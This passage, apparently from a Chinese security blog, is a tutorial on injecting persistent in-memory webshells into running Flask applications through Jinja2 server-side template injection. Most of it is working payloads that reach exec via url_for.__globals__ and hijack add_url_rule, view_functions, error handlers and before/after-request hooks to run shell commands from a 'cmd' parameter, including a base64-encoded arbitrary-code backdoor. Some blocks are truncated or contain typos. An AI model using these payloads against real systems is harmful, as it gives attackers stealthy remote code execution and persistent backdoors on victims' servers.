<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=<span class="string">&quot;&#123;&#123; url_for(&#x27;test&#x27;, name=&#x27;123&#x27;) &#125;&#125;&quot;</span>&gt;&lt;/a&gt;</span><br></pre></td></tr></table></figure></div>

<p>在访问⻚⾯的时候就会出现 </p>
<p>在这个函数的 <strong>globals</strong> ⾥有⼀个 current_app 对象，这个对象在 Flask 中作为全局代理对象来访问 当前的应⽤实例，在后⾯通过 SSTI 实现的内存⻢的时候，我们就需要先拿到当前运⾏FlaskAPP 的 上下⽂。然后再调⽤内建模块中的 eval 和 exec 函数执⾏代码，这样才能操作这个运⾏的Flask APP除 此之外还有 get_flashed_messages </p>
<p>想要在 Flask 中实现内存⻢，要么实现<strong>动态的注册路由</strong>，要么在<strong>请求的前后拦截路由</strong>。 Flask 中可以拦截路由的装饰器或者说钩⼦函数如下 ：</p>
<p>**template_filter() **装饰器：⽤于注册⼀个模板过滤器，这个过滤器可以在Jinja2模板中使⽤。 </p>
<p>**template_global() **装饰器：于注册⼀个全局模板变量或函数，使其在所有模板中都可以使⽤。 </p>
<p>**template_test() **装饰器：⽤于注册⼀个模板测试，测试可以在模板条件中使⽤。 </p>
<p>**add_template_filter() **装饰器：⽤于动态添加模板过滤器，与 template_filter() 装饰器功能相同，但更 灵活。 </p>
<p>**add_template_global() **装饰器：⽤于动态添加全局模板变量或函数，与 template_global() 装饰器功 能相同。 </p>
<p>**add_template_test() **装饰器：⽤于动态添加模板测试，与 template_test() 装饰器功能相同。 </p>
<p>**endpoint() **装饰器：⽤于指定视图函数的端点名称。端点是路由和视图函数的唯⼀标识符。 </p>
<p>**errorhandler() **装饰器：⽤于注册⼀个错误处理函数，当特定的HTTP错误发⽣时调⽤。 </p>
<p>**after_request() **装饰器：⽤于注册⼀个函数，该函数会在每次请求之后调⽤，通常⽤于修改响应对 </p>
<p>象。 </p>
<p>**before_request() **装饰器：⽤于注册⼀个函数，该函数会在每次请求之前执⾏。 </p>
<p>**teardown_request() **装饰器：⽤于注册⼀个函数，该函数会在每次请求结束后调⽤，⽆论请求是否成 功。 </p>
<p>**context_processor() **装饰器：⽤于注册⼀个上下⽂处理器，该处理器返回的字典将合并到模板上下 ⽂中。 </p>
<p>**url_value_preprocessor() **装饰器：⽤于注册⼀个函数，该函数会在请求解析URL参数之前调⽤，可 以⽤于预处理URL参数。 </p>
<p>**url_defaults() **装饰器：⽤于注册⼀个函数，该函数会在构建URL时调⽤，通常⽤于设置URL的默认 </p>
<p>值。</p>
<p>我们随便进⼊⼀个装饰器对应的 Flask 应⽤实例上的⽅法，跟到最后都可以发现基本上都是**对其对应 **</p>
<p><strong>的数据结构进⾏操作</strong>，⽐如使⽤装饰器的时候会向结构体⾥添加⼀条，请求的时候遍历获取到对应装 </p>
<p>饰器的函数然后调⽤。这个数据结构的类型是 collections.defaultdict ，我们在注⼊内存⻢的时候就不 需要调⽤函数，⽽是直接修改这个数据结构的内容。 </p>
<p>下⾯的⽅法中，有的是可以针对蓝图来进⾏的</p>
<h2 id="动态注册路由-app-route-add-url-rule"><a href="#动态注册路由-app-route-add-url-rule" class="headerlink" title="动态注册路由 @app.route - add_url_rule"></a>动态注册路由 @app.route - add_url_rule</h2><p>Flask 中使⽤了 @app.route 装饰器来注册路由，其调⽤的底层函数为： </p>
<p>flask.sansio.scaffold.Scaffold.add_url_rule 。以前⽹上很多关于 Flask 内存⻢都是通过这个函数来注册 ⼀个路由，⽐如：</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>]</span><br><span class="line">( <span class="string">&quot; app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, </span></span><br><span class="line"><span class="string">lambda: &#x27;123&#x27;);&quot;</span>,&#123;<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>这个例⼦调⽤ exec 函数并传⼊了当前的 Flask APP 的上下⽂作为执⾏代码的全局命名空间，所以执 </p>
<p>⾏代码部分可以拿到 app 来调⽤ add_url_rule 注册 &#x2F;shell 的路由，并且⽤⼀个 lambda 表达式作为视 图函数。以前的⽅法是可⾏的，但是⽬前（不知道具体版本从哪⾥开始） Flask APP 在处理了第⼀个 请求后⼜尝试对应⽤进⾏设置是不允许的，所以 app._check_setup_finished 抛出了异常 </p>
<p>这里佬做了源码的分析发现这个函数只是判断了下 _got_first_request 的值，那么既然现在能够访问到 应⽤上下⽂，在 add_url_rule 前修改他的值就可以了 </p>
<p>先看⼀下这个上下⽂⾥有没有这个变量 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].__dict__ &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>有的话直接修改就可以 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;app._got_first_request=False;</span></span><br><span class="line"><span class="string">app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda: &#x27;&lt;pre&gt;&#123;0&#125;</span></span><br><span class="line"><span class="string">&lt;/pre&gt;&#x27;.format(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()));</span></span><br><span class="line"><span class="string">app._got_first_request=True;&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>在使⽤这个函数注⼊内存⻢后要修改内存⻢的话，需要<strong>获取到原来的匿名函数然后修改</strong>。因为再后续 </p>
<p>修改的话 flask 中有⼀个判断视图函数和旧的端点对应函数是不是⼀个，不是的话会抛出异常，函数是 flask.sansio.app.App.add_url_rule ，并且也不⽌这⼀种⽅法，这个函数只是简化了流程，实际上可以 直接去操作： werkzeug.routing.map.Map 和 werkzeug.routing.rules.Rule 这个类以及视图函数结构。 指定请求⽅式和接收参数修改，如果使⽤ exec 执⾏代码是没有返回值的，可以使⽤ eval ，但是 eval 执⾏不了多⾏代码。解决这个其实还好，可以多次执⾏ eval ，也可以在 exec 执⾏的时候将结果保存 到全局变量中， eval 再去获取。请求⽅式 add_url_rule 函数是⽀持的。 </p>
<p>payload </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>]( <span class="string">&quot;app._got_first_request=False; </span></span><br><span class="line"><span class="string">app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda: eval(request.values[&#x27;cmd&#x27;]);, </span></span><br><span class="line"><span class="string">methods=[&#x27;POST&#x27;,&#x27;GET&#x27;]);</span></span><br><span class="line"><span class="string">app._got_first_request=True;&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>需要修改的内存马 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">my_func = lambda: eval(request.values[&#x27;cmd&#x27;]);</span></span><br><span class="line"><span class="string">app.view_functions[&#x27;shell&#x27;] = my_func;</span></span><br><span class="line"><span class="string">app._got_first_request=False;</span></span><br><span class="line"><span class="string">app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, my_func, methods=[&#x27;POST&#x27;,&#x27;GET&#x27;]);</span></span><br><span class="line"><span class="string">app._got_first_request=True;&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__</span><br><span class="line">[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>url_map 在 Flask 应⽤上下⽂中还表示路由和端点的对应关系， </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].url_map</span><br></pre></td></tr></table></figure></div>

<p>回显形如 ‘my_view’: [my_view&gt;] 的键值对，这个键值是在路由类中使⽤了⼯⼚类的迭代器得到的，没 有继续跟下去的必要了，反正⽬前拿到了这个数据结构的位置，就尝试去修改⼀下，由于是⼀个迭代 得到的需要参考⼯⼚类的实现来做。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].url_map._rules_by_endpoint.my_view[<span class="number">0</span>].__dict__ &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>查看⼀下这个类⾥的属性，这样可以避免直接进⼊到⼯⼚类去跟，假设存在methods 属性，是⼀个集合。</p>
<p>往集合添加⼀个 POST 再看看，就已经可以对路由进⾏ POST 请求了，所以可以参考这个来修改。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].url_map._rules_by_endpoint.my_view[<span class="number">0</span>].methods.add(<span class="string">&#x27;POST&#x27;</span>) &#125;&#125;</span><br><span class="line"><span class="comment"># url_for.__globals__[&#x27;current_app&#x27;].url_map._rules_by_endpoint.端点名/视图函数名[0].methods.add(&#x27;POST&#x27;)</span></span><br></pre></td></tr></table></figure></div>

<p> 对于实现内存⻢来说我们需要的还是代码执⾏⽽不光是⼀个 cmdshell。如果需要执⾏多⾏代码并且返 回结果的话，⼀种是不使⽤ lambda 函数作为视图函数，这需要我们在SSTI 漏洞利⽤的时候使⽤ exec 函数，这样可以直接写上需要的函数作为视图函数。 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;def my_func(): data = &#x27;hello&#x27;</span></span><br><span class="line"><span class="string">return data</span></span><br><span class="line"><span class="string">app.view_functions[&#x27;shell&#x27;] = my_func;</span></span><br><span class="line"><span class="string">app._got_first_request=False;</span></span><br><span class="line"><span class="string">app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, my_func, methods=[&#x27;POST&#x27;,&#x27;GET&#x27;]);</span></span><br><span class="line"><span class="string">app._got_first_request=True;&quot;</span>, </span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;curr 11</span></span><br><span class="line"><span class="string">ent_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>或者将函数编码后，使⽤ exec 执⾏定义函数的部分，这样视图函数（内存⻢）也就注册了。⽐如下⾯ 这个 my_func 函数就是内存⻢部分：接收⼀个 cmd 作为执⾏的 Payload，在使⽤ exec 函数的时候可 以为其执⾏代码传递 globals 命名空间对应 parma ， parma[‘resp’] 就是获取执⾏的 Payload 结果。 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">my_func</span>():</span><br><span class="line"> <span class="keyword">import</span> base64</span><br><span class="line"> parma = &#123;<span class="string">&#x27;resp&#x27;</span>: <span class="literal">None</span>&#125;</span><br><span class="line"> <span class="keyword">if</span> <span class="string">&#x27;cmd&#x27;</span> <span class="keyword">in</span> request.values:</span><br><span class="line"> p_code = base64.b64decode(request.values[<span class="string">&#x27;cmd&#x27;</span>])</span><br><span class="line"> <span class="built_in">exec</span>(p_code, parma)</span><br><span class="line"> <span class="keyword">return</span> parma[<span class="string">&#x27;resp&#x27;</span>]</span><br></pre></td></tr></table></figure></div>

<p>那么 Payload 就可以像编写 py 脚本⼀样了，尽量使⽤⾃带库完成，将结果放到 resp 中。 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">cmd_run</span>():</span><br><span class="line"> <span class="keyword">return</span> os.popen(<span class="string">&#x27;whoami&#x27;</span>).read()</span><br><span class="line">resp = cmd_run()</span><br></pre></td></tr></table></figure></div>

<p>**注⼊内存⻢可以这样来： **</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">exec(__import__(&#x27;base64&#x27;).b64decode(&#x27;CmRlZiBteV9mdW5jKCk6CiAgICBpbXBvcnQgYmFzZTY0CiAgICBwYXJtYSA9IHsncmVzcCc6IE5vbmV9CiAgICBpZiAnY21kJyBpbiByZXF1ZXN0LnZhbHVlczoKICAgICAgICBwX2NvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKHJlcXVlc3QudmFsdWVzWydjbWQnXSkKICAgICAgICBleGVjKHBfY29kZSwgcGFybWEpCiAgICByZXR1cm4gcGFybWFbJ3Jlc3AnXQo=&#x27;))</span></span><br><span class="line"><span class="string">app.view_functions[&#x27;shell&#x27;] = my_func;</span></span><br><span class="line"><span class="string">app._got_first_request=False;</span></span><br><span class="line"><span class="string">app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, my_func, methods=[&#x27;POST&#x27;,&#x27;GET&#x27;]);</span></span><br><span class="line"><span class="string">app._got_first_request=True;&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>执⾏ Payload 就将 py 代码 base64 编码后传⼊即可 </p>
<p>获取 session</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__.session.get(<span class="string">&#x27;test&#x27;</span>) &#125;&#125;</span><br><span class="line">Payload = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">def shell_func():</span></span><br><span class="line"><span class="string"> return gl[&#x27;session&#x27;].get(&#x27;test&#x27;)</span></span><br><span class="line"><span class="string">resp = shell_func()</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="修改视图函数-app-endpoint"><a href="#修改视图函数-app-endpoint" class="headerlink" title="修改视图函数 @app.endpoint"></a>修改视图函数 @app.endpoint</h2><p>这个装饰器是⽤来建⽴视图函数和路由之间的关系，底层操作的是数据 view_functions ，⽤法如下 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">app.add_url_rule(<span class="string">&quot;/&quot;</span>, endpoint=<span class="string">&quot;index&quot;</span>)</span><br><span class="line"><span class="meta">@app.endpoint(<span class="params"><span class="string">&quot;index&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> ...</span><br></pre></td></tr></table></figure></div>

<p>我们可以通过** url_for.<strong>globals</strong>[‘current_app’].<strong>dict</strong>[‘url_map’] **</p>
<p>来查看当前应⽤上下⽂中的** endpoint <strong>和</strong>路由**的对应关系，也就知道了有哪些 **endpoint **，如果没有设置 **endpoint <strong>，那么默认就是其视图函数名，可以通</strong>url_for.<strong>globals</strong>[‘current_app’].<strong>dict</strong>[‘view_functions’] **</p>
<p>查看视图函数， </p>
<p>这样可以区别出哪些是 <strong>endpoint <strong>，哪些是</strong>视图函数</strong>。 </p>
<blockquote>
<p>endpoint 是指通过 URL 路由与视图函数（即处理请求的函数）进行关联的名字。每个路由都有一 </p>
<p>个对应的视图函数，视图函数处理传入的 HTTP 请求并返回响应。 </p>
<p>这个参数允许你为这个路由设置一个别名或名称，方便你在应用中生成 URL 或进行路由跳转。 </p>
</blockquote>
<p>⽐如这⾥有⼀个** hello_endpoint **对应路由 **&#x2F;hello **，对应的视图函数是 **hello_world **</p>
<p>由于直接修改的话会导致这个路由都变成内存⻢，因为这⾥是直接调⽤了视图函数处理返回，⽽不是 </p>
<p>在视图函数前后处理。我们可以通过如下 Payload 修改其视图函数，实现 &#x2F;hello 上的内存⻢的同时不影响原来的⻚⾯ </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.backup_func=app.view_functions[&#x27;hello_endpoint&#x27;];</span></span><br><span class="line"><span class="string">app.view_functions[&#x27;hello_endpoint&#x27;]=lambda :</span></span><br><span class="line"><span class="string">__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read() </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27; in request.args.keys()</span></span><br><span class="line"><span class="string">is not None else</span></span><br><span class="line"><span class="string">app.backup_func()&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.</span><br><span class="line"> __globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br><span class="line"><span class="comment"># 直接</span></span><br><span class="line">app.view_functions[<span class="string">&#x27;hello_endpoint&#x27;</span>]=l</span><br></pre></td></tr></table></figure></div>

<p>&#x2F;hello?cmd&#x3D;…</p>
<h2 id="请求拦截路由内存⻢"><a href="#请求拦截路由内存⻢" class="headerlink" title="请求拦截路由内存⻢"></a>请求拦截路由内存⻢</h2><h3 id="app-errorhandler"><a href="#app-errorhandler" class="headerlink" title="@app.errorhandler"></a>@app.errorhandler</h3><p>这个装饰器⽤于注册⼀个错误处理函数，当特定的 HTTP 错误发⽣时调⽤。其最终操作的数据是 </p>
<p>error_handler_spec ⽤法如下 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">404</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">page_not_found</span>(<span class="params">error</span>):</span><br><span class="line"> <span class="keyword">return</span> <span class="string">&#x27;This page does not exist&#x27;</span>, <span class="number">404</span></span><br></pre></td></tr></table></figure></div>

<p>可以通过 **url_for.<strong>globals</strong>[‘current_app’].<strong>dict</strong>[‘error_handler_spec’] **查看有没有错误处理函数 </p>
<p>使⽤下⾯的 Payload 可以实现针对 404 错误的内存⻢，当访问⼀个不存在的路由就会触发。 </p>
<p>实现了错误处理函数 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.backup_errfunc=app.error_handler_spec[None][404]</span></span><br><span class="line"><span class="string">[app._get_exc_class_and_code(404)[0]];</span></span><br><span class="line"><span class="string">app.error_handler_spec[None][app._get_exc_class_and_code(404)</span></span><br><span class="line"><span class="string">[1]][app._get_exc_class_and_code(404)[0]] = lambda </span></span><br><span class="line"><span class="string">c: __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read() </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27; in request.args.keys() else app.backup_errfunc(c)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.</span><br><span class="line"> __globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>默认情况下以及拦截全局异常 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.error_handler_spec[None][404][app._get_exc_class_and_code(404)[0]] = lambda </span></span><br><span class="line"><span class="string">c: __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read() </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27; inrequest.args.keys() else c&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_</span><br></pre></td></tr></table></figure></div>



<h3 id="app-url-value-preprocessor"><a href="#app-url-value-preprocessor" class="headerlink" title="@app.url_value_preprocessor"></a>@app.url_value_preprocessor</h3><p>这个装饰器⽤于注册⼀个函数，该函数会在请求解析URL参数之前调⽤，可以⽤于预处理URL参数。 </p>
<p>其最终操作的数据是 url_value_preprocessors ，在处理请求的时候，函数flask.app.Flask.preprocess_request 先对遍历了它来直接调⽤对应的函数，并且这个没有对函数的返 回值进⾏处理，也就是⽆回显，是对全局⽣效。 </p>
<p>是针对的全局路由并且⽆回显,不想影响到其他路由先判断⼀下是否有回显 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.url_value_preprocessors[None].append(lambda ep, args :</span></span><br><span class="line"><span class="string">__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)) </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27; in request.args.keys() else None)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], </span><br><span class="line"><span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p><strong>⽆回显的解决⽅法，在</strong>flask不出网回显方式中就总结了无回显的解决方法，这里不在赘述</p>
<h3 id="app-before-request"><a href="#app-before-request" class="headerlink" title="@app.before_request"></a>@app.before_request</h3><p>这个装饰器⽤于注册⼀个函数，该函数会在每次请求之前执⾏。它常⽤于在处理请求之前进⾏⼀些预 </p>
<p>处理操作，如验证⽤户身份、设置全局变量等。最终操作的数据是 before_request_funcs </p>
<p>可以通过** url_for.<strong>globals</strong>[‘current_app’].<strong>dict</strong>[‘before_request_funcs’] **查看有哪些 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.before_request_funcs.setdefault(None, []).append(lambda : &#x27;&lt;pre&gt;&#123;0&#125;</span></span><br><span class="line"><span class="string">&lt;/pre&gt;&#x27;.format(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()) </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27;in request.args.keys() is not None else None)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:</span><br><span class="line"> url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>



<h3 id="app-after-request"><a href="#app-after-request" class="headerlink" title="@app.after_request"></a>@app.after_request</h3><p>这个装饰器⽤于注册⼀个函数，该函数会在每次请求之后调⽤，通常⽤于修改响应对象。其最终操作 </p>
<p>的数据为 after_request_funcs ，当⼀个请求在返回之前会传⼊⼀个 Response 调⽤process_response 函数来对响应进⾏处理。定义的处理函数需要接收⼀个 Response 对象处理后返回 Response 对象。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.after_request_funcs.setdefault(None, []).</span></span><br><span class="line"><span class="string">append(lambda resp: ufg[&#x27;Response&#x27;](&#x27;&lt;pre&gt;&#123;0&#125;&lt;/pre&gt;&#x27;.</span></span><br><span class="line"><span class="string">format(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read())) </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27;in request.args.keys() is not None else resp)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;ufg&#x27;</span>: url_for.__globals__,</span><br><span class="line"><span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure></div>



